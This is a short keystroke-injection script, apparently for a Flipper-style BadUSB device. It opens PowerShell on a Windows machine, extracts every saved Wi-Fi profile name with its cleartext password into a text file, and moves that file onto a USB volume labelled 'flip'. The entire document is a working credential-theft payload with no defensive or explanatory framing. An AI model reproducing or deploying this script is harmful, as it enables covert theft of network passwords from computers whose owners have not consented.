layout('us') //set layout us
 
press("GUI r") // windows + r

delay(500)

type("powershell\n") // write powershell and press "enter"

delay(1000)

type('(netsh wlan show profiles) | Select-String "\\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >> p1f1.txt  \n')

delay(500)

type("$usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'flip' } | select name\n")
 
type("Move-Item -Path p1f1.txt -Destination $usbpath.name\n")

type("exit\n")  //exit
